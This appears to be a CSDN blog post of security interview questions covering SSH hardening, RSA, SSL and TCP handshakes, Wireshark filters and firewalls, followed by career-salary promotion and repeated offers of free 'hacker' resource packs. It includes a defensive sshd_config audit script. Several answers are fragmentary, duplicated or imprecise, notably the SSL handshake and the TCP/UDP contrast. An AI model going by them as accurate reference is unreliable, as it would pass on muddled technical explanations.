In a Linux system, which configuration items of which configuration files should be checked to improve the security of SSH?

/etc/ssh/sshd_config

iptables configuration
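The sshd_config check from the question above, as an added Python example that is not part of the original article: it parses the file the way sshd reads it (comments stripped, first occurrence of a directive wins, global section only) and reports directives that differ from a hardening baseline. The baseline and the OpenSSH defaults in `DEFAULTS` are assumptions taken from the sshd_config manual page; the sample configuration is constructed.

```python
import re
from typing import Callable, Dict, List, Tuple

# hardening baseline (assumed): directive -> (acceptable?, advice)
CHECKS: Dict[str, Tuple[Callable[[str], bool], str]] = {
    "permitrootlogin": (lambda v: v == "no", "set PermitRootLogin no"),
    "passwordauthentication": (lambda v: v == "no", "set PasswordAuthentication no (key-based login only)"),
    "permitemptypasswords": (lambda v: v == "no", "set PermitEmptyPasswords no"),
    "maxauthtries": (lambda v: v.isdigit() and int(v) <= 4, "set MaxAuthTries 4 or lower"),
    "x11forwarding": (lambda v: v == "no", "set X11Forwarding no"),
}

# value sshd uses when the directive is absent (assumed from the sshd_config man page)
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "permitemptypasswords": "no",
    "maxauthtries": "6",
    "x11forwarding": "no",
}

# constructed sshd_config
SAMPLE_CONFIG = """\
# constructed sample
Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 10
PermitRootLogin no      # ignored: sshd keeps the first value it reads
Match User deploy
    PasswordAuthentication no
"""


def parse_sshd_config(text: str) -> Dict[str, str]:
    """Global directives only, lower-cased keys, first occurrence wins (as in sshd)."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.lower().startswith("match "):      # per-user/host overrides start here
            break
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        settings.setdefault(parts[0].lower(), parts[1].strip())
    return settings


def audit_sshd_config(text: str) -> List[str]:
    """One finding per baseline directive whose effective value is not acceptable."""
    settings = parse_sshd_config(text)
    findings: List[str] = []
    for key, (ok, advice) in CHECKS.items():
        value = settings.get(key, DEFAULTS[key])
        if not ok(value.lower()):
            origin = "explicit" if key in settings else "default"
            findings.append(f"{key}={value} ({origin}): {advice}")
    return findings
```

Reporting the effective value, including implicit defaults such as `PasswordAuthentication yes`, is the point of the check: an sshd_config that simply omits a directive is not hardened.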
How to view the last 100 lines of file content with one command

tail -n 100 filename

Windows: how to harden the Windows desktop working environment in a domain environment? Please give your thoughts.

5. Cryptography

The specific working steps of AES/DES

RSA algorithm

Encryption:
ciphertext = plaintext^E mod N

RSA encryption raises the plaintext to the power E, divides by N and takes the remainder.
Public key = (E, N)

Decryption:
plaintext = ciphertext^D mod N, private key = (D, N)

Three parameters n, e1, e2

n is the product of two large primes p, q
Encryption mode of block cipher
How to generate a safe random number?

Quoting the answer of a previous senior, random numbers can be generated through some physical systems, such as voltage fluctuations, seek time of disk heads when reading/writing, and noise of electromagnetic waves in the air.
SSL handshake process

Establish a TCP connection, the client sends an SSL request, the server processes the SSL request, the client sends the random data encrypted by the public key, the server decrypts the encrypted random data with the private key and negotiates the password, the server and the client use The cipher generates the encryption algorithm and the key key, and then communicates normally. This part was originally forgotten, but when I watched SSL Pinning before, I seemed to remember a picture in my mind. After struggling for a long time, I was still not sure, so I gave up. . .
What are the differences between symmetric encryption and asymmetric encryption?

6、TCP/IP

The process of TCP three-way handshake and the corresponding state transition

(1) The client sends a SYN packet to the server, containing the port number used by the client and the initial sequence number x;
(2) After receiving the client's SYN packet, the server sends the client a TCP segment with both the SYN and ACK bits set, containing the acknowledgment number x+1 and the server's initial sequence number y;
(3) After receiving the server's SYN+ACK segment, the client returns an ACK segment with acknowledgment number y+1 and sequence number x+1, and a standard TCP connection is established.

The difference between TCP and UDP protocols

TCP is connection-oriented, UDP is message-oriented; TCP places more demands on system resources

a. The client sends a request to the server.
b. The server returns its certificate and public key; the public key is part of the certificate.
c. The client verifies the validity of the certificate and public key. If valid, it generates a shared key, encrypts it with the public key and sends it to the server.
d. The server decrypts the data with its private key, uses the received shared key to encrypt data, and sends it to the client.
e. The client decrypts the data with the shared key.
f. The SSL encrypted channel is established.

7. Traffic analysis

Wireshark simple filtering rules

filter ip:

Filter by source IP address: ip.src == 1.1.1.1; by destination IP address: ip.dst == 1.1.1.1

Filter port:

Filter port 80: tcp.port == 80; source port: tcp.srcport == 80; destination port: tcp.dstport == 80

Protocol filtering:

Just enter the protocol name directly, such as http protocol http

http pattern filtering:

Filter GET/POST packets: http.request.method == "GET" (or "POST")

8. Firewall

Briefly describe several basic configuration reinforcement items commonly used in network devices such as routers, switches, and firewalls, as well as configuration methods.

Partners who need a full set of pdf versions can send [ask for sharing] in the comment area, and I will send them one by one

Digression

Many people who are new to the computer industry or graduates of computer-related majors have encountered obstacles everywhere due to lack of practical experience. Let's look at two sets of data:

  • The 2023 national college graduates are expected to reach 11.58 million, and the employment situation is severe;

  • According to the data released by the National Network Security Publicity Week, by 2027 the shortage of network security personnel in China will reach 3.27 million.

On the one hand, the employment situation of fresh graduates is severe every year, and on the other hand, there is a gap of one million cyber security talents.

On June 9, the 2023 edition of the Employment Blue Book of MyCOS Research (including the 2023 Employment Report for Undergraduates in China and the Employment Report for Higher Vocational Students in China in 2023) was officially released.

Top 10 Majors with Higher Monthly Salary for 2022 College Graduates

The monthly income of undergraduate computer science majors and higher vocational automation majors is relatively high. The monthly income of the 2022 class of undergraduate computer science and higher vocational automation majors is 6,863 yuan and 5,339 yuan, respectively. Among them, the starting salary of undergraduate computer majors is basically the same as that of the 2021 class, while the monthly income of higher vocational automation majors has increased significantly, overtaking railway transportation majors (5,295 yuan) to rank first for the 2022 class.

Specifically, by major, the undergraduate major with the highest monthly income in the 2022 class is information security (7,579 yuan). Compared with the class of 2018, undergraduate majors related to artificial intelligence, such as electronic science and technology and automation, performed well, and their starting salaries increased by 19% compared with five years ago. Although data science and big data technology are newly added majors in recent years, they have performed well and rank among the top three majors by monthly income half a year after graduation for the 2022 undergraduate class. The only humanities and social science major that entered the undergraduate top 10 high-paying list five years ago, French, has dropped out of the top 10.

"There is no national security without cybersecurity". At present, network security has been elevated to the height of national strategy and has become one of the most important factors affecting national security and social stability.

Characteristics of the network security industry

1. The employment salary is very high, and the salary rises quickly. In 2021, Liepin.com released the highest employment salary in the network security industry, which is 337,700 yuan per capita!

2. There is a large talent gap and many employment opportunities

On September 18, 2019, the official website of the "Central People's Government of the People's Republic of China" published: China needs 1.4 million cyberspace security talents, but schools across the country train fewer than 1.5 million people each year. Liepin.com's "Cyber Security Report for the First Half of 2021" predicts that the demand for cyber security talents will be 3 million in 2027, while there are only 100,000 employees currently engaged in the cyber security industry.

The industry has a lot of room for development and many jobs

Since the establishment of the network security industry, dozens of new network security positions have been added: network security expert, network security analyst, security consultant, network security engineer, security architect, security operation and maintenance engineer, penetration engineer, information security management, data security engineer, network security operations engineer, network security emergency response engineer, data appraiser, network security product manager, network security service engineer, network security trainer, network security auditor, threat intelligence analysis engineer, disaster recovery professional, practical offensive and defensive professional...

Great career potential

The network security major has strong technical characteristics, especially mastering the core network architecture and security technology in the work, which has an irreplaceable competitive advantage in career development.

With the continuous improvement of personal ability, the professional value of the work will also increase with the enrichment of one's own experience and the maturity of project operation, and the appreciation space is bullish all the way, which is the main reason why it is popular with everyone.

To some extent, in the field of network security, just like the doctor profession, the older you are, the more popular you become. Because the technology becomes more mature, the work will naturally be valued, and promotion and salary increase are a matter of course.

How to Learn Hacking & Cyber Security

Today, as long as you give my article a thumbs-up, I will share my private collection of online security learning materials with you for free, so let’s see what is there.

1. Learning Roadmap

There are also many things to learn in attack and defense. I have written all the specific things to learn in the roadmap above. If you can learn them, you will have no problem getting a job or taking private jobs.

2. Video Tutorial

Although there are many learning resources on the Internet, they are basically incomplete. This is a video tutorial on cyber security recorded by myself. I have a supporting video explanation for every knowledge point in the above roadmap.

The content covers the study of network security law, network security operation and other guarantee assessment, penetration testing basics, detailed explanation of vulnerabilities, basic computer knowledge, etc., which are all learning contents that must be known when getting started with network security.

(It’s all packed into one piece and cannot be unfolded one by one. There are more than 300 episodes in total)

Due to limited space, only part of the information is shown, you need to click the link below to get it

CSDN spree: "Hacker & Network Security Introduction & Advanced Learning Resource Pack" free sharing

3. Technical documents and e-books

The technical documents are also compiled by myself, including my experience and technical points of participating in large-scale network security operations, CTF and SRC vulnerability mining. There are also more than 200 e-books. Due to the sensitivity of the content, I will not show them one by one.

Due to limited space, only part of the information is shown, you need to click the link below to get it

CSDN spree: "Hacker & Network Security Introduction & Advanced Learning Resource Pack" free sharing

4. Toolkit, interview questions and source code

"If you want to do a good job, you must first sharpen your tools." I have summarized dozens of the most popular hacking tools for everyone. The scope of coverage mainly focuses on information collection, Android hacking tools, automation tools, phishing, etc. Interested students should not miss it.

There is also the source code of the case and the corresponding toolkit mentioned in my video, which can be taken away if needed.

Due to limited space, only part of the information is shown, you need to click the link below to get it

CSDN spree: "Hacker & Network Security Introduction & Advanced Learning Resource Pack" free sharing

Finally, there are interview questions about Internet security that I have sorted out in the past few years. If you are looking for a job in Internet security, they will definitely help you a lot.

These questions are often encountered in interviews with Sangfor, Qi Anxin, Tencent or other major companies. If you have good questions or good insights, please share them.

Reference analysis: Sangfor official website, Qi Anxin official website, Freebuf, csdn, etc.

Content features: clear organization, including graphic representation, which is easier to understand.

Summary of content: Including intranet, operating system, protocol, penetration test, security service, vulnerability, injection, XSS, CSRF, SSRF, file upload, file download, file inclusion, XXE, logic vulnerability, tool, SQLmap, NMAP, BP, MSF…

Due to limited space, only part of the information is shown, you need to click the link below to get it

CSDN spree: "Hacker & Network Security Introduction & Advanced Learning Resource Pack" free sharing


Origin blog.csdn.net/Python_0011/article/details/132364469